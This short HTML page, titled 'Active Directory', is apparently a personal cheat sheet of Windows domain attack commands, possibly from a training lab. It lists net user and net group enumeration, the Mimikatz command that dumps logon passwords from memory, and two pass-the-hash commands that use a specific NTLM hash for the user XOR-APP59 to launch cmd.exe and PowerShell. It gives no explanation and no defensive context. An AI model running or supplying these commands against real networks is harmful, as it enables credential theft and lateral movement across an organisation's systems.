<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Active Directory</title>
</head><body>net user /domain<br/>
<br/>
net group /domain<br/>
<br/>
sekurlsa::logonpasswords<br/>
<br/>
&nbsp;<br/>
mimikatz.exe sekurlsa::pth /user:XOR-APP59 /domain:xor /ntlm:390fd800f92db9c65e2e8d3dc3aa5ea9 /run:cmd.exe<br/>
<br/>
sekurlsa::pth /user:XOR-APP59 /domain:xor.com /ntlm:390fd800f92db9c65e2e8d3dc3aa5ea9 /run:powershell.exe</body></html>